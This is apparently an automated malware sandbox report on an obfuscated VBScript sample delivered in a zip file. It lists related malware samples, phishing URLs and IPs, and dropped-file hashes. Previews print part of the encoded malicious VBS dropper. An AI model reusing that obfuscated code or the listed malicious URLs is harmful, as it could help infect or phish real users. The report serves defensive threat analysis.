                                                                                                                                                                                                                                        https://eventmidasbuyz.merchats.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 46.105.222.82
                                                                                                                                                                                                                                        res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 149.60.1.98
                                                                                                                                                                                                                                        res.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 188.165.189.140
                                                                                                                                                                                                                                        https://je.engl6.shop/webro-DPD-notificare/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.38.113.8
                                                                                                                                                                                                                                        https://tt.vg/notificareDPD02Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 51.178.195.217
                                                                                                                                                                                                                                        res.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 176.31.225.194
                                                                                                                                                                                                                                        https://eminentpr.com/?nnt=dG9ueWEuZ3JlZW5sZXlAc3BvbmdlLWN1c2hpb24uY29tLS0tLUNoYWQgU2ltbW9ucw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 51.222.174.97
                                                                                                                                                                                                                                        dokument_20250130_0011.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 146.59.116.84
                                                                                                                                                                                                                                        VMAGE-ASRUsvc2.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                        • 2.59.163.71
                                                                                                                                                                                                                                        file.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                        • 2.59.163.172
                                                                                                                                                                                                                                        #U0414#U043e#U0433#U043e#U0432i#U0440_#U043f#U043e#U0441#U0442#U0430#U0432#U043a#U0438.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                        • 2.59.163.172
                                                                                                                                                                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                        • 45.130.170.23
                                                                                                                                                                                                                                        JzDYvnUh8s.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                        • 5.182.36.101
                                                                                                                                                                                                                                        Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 2.59.163.43
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 193.43.91.119
                                                                                                                                                                                                                                        file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                                        • 193.43.91.119
                                                                                                                                                                                                                                        Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 45.89.54.11
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 2.59.161.36
                                                                                                                                                                                                                                        OVHFRhttps://westallisheating.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                        • 51.81.55.251
                                                                                                                                                                                                                                        Bank Slip pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                                        • 54.39.129.84
                                                                                                                                                                                                                                        https://eventmidasbuyz.merchats.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 46.105.222.82
                                                                                                                                                                                                                                        res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 149.60.1.98
                                                                                                                                                                                                                                        res.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 188.165.189.140
                                                                                                                                                                                                                                        https://je.engl6.shop/webro-DPD-notificare/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.38.113.8
                                                                                                                                                                                                                                        https://tt.vg/notificareDPD02Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 51.178.195.217
                                                                                                                                                                                                                                        res.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 176.31.225.194
                                                                                                                                                                                                                                        https://eminentpr.com/?nnt=dG9ueWEuZ3JlZW5sZXlAc3BvbmdlLWN1c2hpb24uY29tLS0tLUNoYWQgU2ltbW9ucw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 51.222.174.97
                                                                                                                                                                                                                                        dokument_20250130_0011.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 146.59.116.84
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19dokument_20250130_0011.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        CustomerWishlist21.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        FACTURA 9500.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        FACTURA 9500.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        Payment Copy88382pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        New Order.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        Request for Quotation_0202025_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        vs3s1u39EK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.17942.17934.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                        • 54.39.156.32
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dllhttps://copyfol.io/v/876d7kpcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          helpdesk@brother.com.hTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            SARS NOTICE.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              #U041erder.Request.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                ATT475283.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  Statement 01-28-25.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    Pay_Increase5390_26946.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      AuditTdcj.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        https://thehouseofportable.com/download/?id=359&k=13Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          querida.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                                                                            Entropy (8bit):5.175134110355963
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                                                                                                                                                                                                            MD5:C2B26B17141E97DA490556030D44F1C3
                                                                                                                                                                                                                                                            SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                                                                                                                                                                                                            SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                                                                                                                                                                                                            SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):5829
                                                                                                                                                                                                                                                            Entropy (8bit):4.901113710259376
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                                                                                                                            MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                                                                                                                            SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                                                                                                                            SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                                                                                                                            SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\7za.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (13979), with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13979
                                                                                                                                                                                                                                                            Entropy (8bit):4.185570705292709
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:gN//g5o3l2nheuRu9FskIi+X3HPQXOLtfuTdQxHQnvxu79mX:gxY23lu4sxHHH4XOLthHQnpu79m
                                                                                                                                                                                                                                                            MD5:71596608A08695ACA02ED3DDCE88E449
                                                                                                                                                                                                                                                            SHA1:3DB9DF1DC99661FA727D1565F5CBB19306AC5ECC
                                                                                                                                                                                                                                                            SHA-256:4E19AE357BF8069D9C2D4D6AA645364020978642B76647E0A67EEA80E010AD10
                                                                                                                                                                                                                                                            SHA-512:8597971FAE9269E8448D60C9369ABF13AD333ABF22BF6FFDAC5ACC89F898B64FC706FFAAA340BDF6ED28E037C8422FD85811AD9204C8C3789037E87659672C66
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Preview:lpAridpqPAktwPTQljJqUGvWO = Split("FoALwtGr EacALwtGh QRXVRdWOXPQsUORyMgoCWOmisJJx IALwtGn SplALwtGit(""-52+209Li152+36Li440/ALwtG4Li588/ALwtG4Li614-422Li576/ALwtG3Li378/ALwtG2Li576/ALwtG3Li-128+238Li480/ALwtG3Li-274+453Li386/ALwtG2Li-184+379Li390-203Li358/ALwtG2Li440/4Li312/2Li413-234Li-259+457Li388/2Li330/3Li474-338Li228-118Li330/3Li304-194Li372-211Li537/3Li776/4Li-164+274Li576/3Li379-200Li382/2Li314/2Li-130+306Li676-492Li330/3Li64+75Li574-464Li-156+301Li-82+274Li414-235Li525/3Li582/3Li-158+337Li471/3Li411-235Li329-145Li656-477Li518-341Li221-27Li351-233Li506-394Li-89+276Li-85+278Li505-307Li274-87Li-13+199Li384/3Li248/2Li-251+449Li374/2Li-202+388Li392-210Li-200+394Li776/4Li-34+224Li-309+421Li-4+123Li-238+348Li211-75Li330/3Li95+15Li-299+409Li150-5Li350/2Li558/3Li91+95Li-351+461Li276-84Li716/4Li366-175Li628/4Li704/4Li77+107Li161-37Li116+41Li137+53Li-31+210Li416-228Li472/4Li224/2Li-269+418Li351-172Li776/4Li502-390Li151-29Li398-288Li204-92Li728/4Li-69+263Li613-419Li290-100Li219-26Li-319+4
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1440
                                                                                                                                                                                                                                                            Entropy (8bit):5.143682541016062
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:5OfQiJVRiJjWITiJVRiJUwTRiJfYgiJVRiJFTAdiJbZiJTdiJouiJEiJVRiJxci/:EQGVRGbTGVRGpTRGAgGVRGpCGbZG5G7l
                                                                                                                                                                                                                                                            MD5:3E5773265C6DCC30FF3469BD95698562
                                                                                                                                                                                                                                                            SHA1:E18FD628A1CA298A001BD5C9E9C69F253E7C5495
                                                                                                                                                                                                                                                            SHA-256:47F1DF4ADB04192925176F4633AB03761562EB291134D761C55471176351BB79
                                                                                                                                                                                                                                                            SHA-512:4374E88669C53FBDA08D689EA49C32C66BE989AC3D2EACB9B2180568CA5E4DBE64C912C8915140C4AC549C5E4E48016FAA79A4CC46E2AA336FBBE7F0B71B3B01
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:02/05/2025 1:56 AM: Unpack: C:\Users\user\Downloads\CfF7MWq7aG.zip..02/05/2025 1:56 AM: Tmp dir: C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p..02/05/2025 1:56 AM: Received from standard out: ..02/05/2025 1:56 AM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..02/05/2025 1:56 AM: Received from standard out: ..02/05/2025 1:56 AM: Received from standard out: Scanning the drive for archives:..02/05/2025 1:56 AM: Received from standard out: 1 file, 14111 bytes (14 KiB)..02/05/2025 1:56 AM: Received from standard out: ..02/05/2025 1:56 AM: Received from standard out: Extracting archive: C:\Users\user\Downloads\CfF7MWq7aG.zip..02/05/2025 1:56 AM: Received from standard out: --..02/05/2025 1:56 AM: Received from standard out: Path = C:\Users\user\Downloads\CfF7MWq7aG.zip..02/05/2025 1:56 AM: Received from standard out: Type = zip..02/05/2025 1:56 AM: Received from standard out: Physical Size = 14111..02/05/2025 1:56 AM: Received from stan
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):14111
                                                                                                                                                                                                                                                            Entropy (8bit):4.235871048140784
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:tN//g5o3l2nheuRu9FskIi+X3HPQXOLtfuTdQxHQnvxu79ma:txY23lu4sxHHH4XOLthHQnpu79R
                                                                                                                                                                                                                                                            MD5:2732BA56F240D5FAE4400C311ED9D221
                                                                                                                                                                                                                                                            SHA1:8D7286D178FB0A08635C978BBC9C8BEC418DC235
                                                                                                                                                                                                                                                            SHA-256:2BD8F3C6CA21F2CFDA1E702928290000068D385E02A75462C6B0ED2A95EEBB44
                                                                                                                                                                                                                                                            SHA-512:E6D127AB217CDAC5B2610EFBA3F74C287569FD04014414DB175F6EA4117C68F32FB69A8DDE395A70894EE2B3D828121403994DA0ED7003285CBABB9D4B5D2498
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Preview:PK.........7AZ..;..6...6......2025010453906.vbslpAridpqPAktwPTQljJqUGvWO = Split("FoALwtGr EacALwtGh QRXVRdWOXPQsUORyMgoCWOmisJJx IALwtGn SplALwtGit(""-52+209Li152+36Li440/ALwtG4Li588/ALwtG4Li614-422Li576/ALwtG3Li378/ALwtG2Li576/ALwtG3Li-128+238Li480/ALwtG3Li-274+453Li386/ALwtG2Li-184+379Li390-203Li358/ALwtG2Li440/4Li312/2Li413-234Li-259+457Li388/2Li330/3Li474-338Li228-118Li330/3Li304-194Li372-211Li537/3Li776/4Li-164+274Li576/3Li379-200Li382/2Li314/2Li-130+306Li676-492Li330/3Li64+75Li574-464Li-156+301Li-82+274Li414-235Li525/3Li582/3Li-158+337Li471/3Li411-235Li329-145Li656-477Li518-341Li221-27Li351-233Li506-394Li-89+276Li-85+278Li505-307Li274-87Li-13+199Li384/3Li248/2Li-251+449Li374/2Li-202+388Li392-210Li-200+394Li776/4Li-34+224Li-309+421Li-4+123Li-238+348Li211-75Li330/3Li95+15Li-299+409Li150-5Li350/2Li558/3Li91+95Li-351+461Li276-84Li716/4Li366-175Li628/4Li704/4Li77+107Li161-37Li116+41Li137+53Li-31+210Li416-228Li472/4Li224/2Li-269+418Li351-172Li776/4Li502-390Li151-29Li398-288Li204-92Li7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):14111
                                                                                                                                                                                                                                                            Entropy (8bit):4.235871048140784
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:tN//g5o3l2nheuRu9FskIi+X3HPQXOLtfuTdQxHQnvxu79ma:txY23lu4sxHHH4XOLthHQnpu79R
                                                                                                                                                                                                                                                            MD5:2732BA56F240D5FAE4400C311ED9D221
                                                                                                                                                                                                                                                            SHA1:8D7286D178FB0A08635C978BBC9C8BEC418DC235
                                                                                                                                                                                                                                                            SHA-256:2BD8F3C6CA21F2CFDA1E702928290000068D385E02A75462C6B0ED2A95EEBB44
                                                                                                                                                                                                                                                            SHA-512:E6D127AB217CDAC5B2610EFBA3F74C287569FD04014414DB175F6EA4117C68F32FB69A8DDE395A70894EE2B3D828121403994DA0ED7003285CBABB9D4B5D2498
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:PK.........7AZ..;..6...6......2025010453906.vbslpAridpqPAktwPTQljJqUGvWO = Split("FoALwtGr EacALwtGh QRXVRdWOXPQsUORyMgoCWOmisJJx IALwtGn SplALwtGit(""-52+209Li152+36Li440/ALwtG4Li588/ALwtG4Li614-422Li576/ALwtG3Li378/ALwtG2Li576/ALwtG3Li-128+238Li480/ALwtG3Li-274+453Li386/ALwtG2Li-184+379Li390-203Li358/ALwtG2Li440/4Li312/2Li413-234Li-259+457Li388/2Li330/3Li474-338Li228-118Li330/3Li304-194Li372-211Li537/3Li776/4Li-164+274Li576/3Li379-200Li382/2Li314/2Li-130+306Li676-492Li330/3Li64+75Li574-464Li-156+301Li-82+274Li414-235Li525/3Li582/3Li-158+337Li471/3Li411-235Li329-145Li656-477Li518-341Li221-27Li351-233Li506-394Li-89+276Li-85+278Li505-307Li274-87Li-13+199Li384/3Li248/2Li-251+449Li374/2Li-202+388Li392-210Li-200+394Li776/4Li-34+224Li-309+421Li-4+123Li-238+348Li211-75Li330/3Li95+15Li-299+409Li150-5Li350/2Li558/3Li91+95Li-351+461Li276-84Li716/4Li366-175Li628/4Li704/4Li77+107Li161-37Li116+41Li137+53Li-31+210Li416-228Li472/4Li224/2Li-269+418Li351-172Li776/4Li502-390Li151-29Li398-288Li204-92Li7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1558
                                                                                                                                                                                                                                                            Entropy (8bit):5.11458514637545
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                                                                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                                                                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                                                                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                                                                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1864
                                                                                                                                                                                                                                                            Entropy (8bit):6.00682540004288
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/hUjSoCWAdte7akapu8IA1MSrhykmwDkV:RfpWQte7aSunyRb
                                                                                                                                                                                                                                                            MD5:28706AD42E4C615A683C2494BC0BD2AF
                                                                                                                                                                                                                                                            SHA1:6B0465B3D5E85A3EA76C646BA8652C4DC0248DC0
                                                                                                                                                                                                                                                            SHA-256:709BBB3E3A17E2B7BBF9F4AFDCF465312695342CE4EB203DF284233EACEE086F
                                                                                                                                                                                                                                                            SHA-512:E95DA92F1AD5F56EF61A5992A1B465D46F36EFF1FC85643CC5AB3F357B6F14D81A5B5590D0E18D4DA5FCC3AC537A469FD0C15B116A3471536707A9716119FA5F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6ImtleXMuanNvbiIsInJvb3RfaGFzaCI6IlJ1R2ZTVTVlZVdiRHczOVpOMmQ5NHhIRkJuY2JNMWxtZXgybk5ZVmhMU00ifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiVXdpQzFfVTFybGVra0d5bk5iRVp5ZU5rZ011M2dNZm9yVGZKeVAzejJiRSJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImtpYWJoYWJqZGJramRwamJwaWdmb2RiZGptYmdsY29vIiwiaXRlbV92ZXJzaW9uIjoiMjAyNS4xLjE3LjEiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"DjJ0cJJFQPGNShH6cqF0KMXYB9LDN7hZ0z-M2b0RfT3cl9Mxp62MiQM0bqevSkL0tNe9rHL_VWqPqY7PDdCoumMJ-TVwboLlLJq3c1H9NYQgQ-nQS4F3mFBvP0YJ-Kunf6byMQnF4FLGqtuRouNWZBUqyahkm__1_0-5qoAVqSms3wmBnmVhb1z4p-I6jEjko0pLBq4dad2vH7G6THiOPP15L1ozQ42gvfw5aLvn_Itjpwq7GaU9lNv
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6690
                                                                                                                                                                                                                                                            Entropy (8bit):5.981211959058716
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:UXq6pG2GE+Vy2+m0plhYvPuW+wkpTm+ozdswsDm4+uTagSfC3AQj+y:uNtGbVKm4lOvMwkoR9PuGs3gy
                                                                                                                                                                                                                                                            MD5:BEF4F9F856321C6DCCB47A61F605E823
                                                                                                                                                                                                                                                            SHA1:8E60AF5B17ED70DB0505D7E1647A8BC9F7612939
                                                                                                                                                                                                                                                            SHA-256:FD1847DF25032C4EEF34E045BA0333F9BD3CB38C14344F1C01B48F61F0CFD5C5
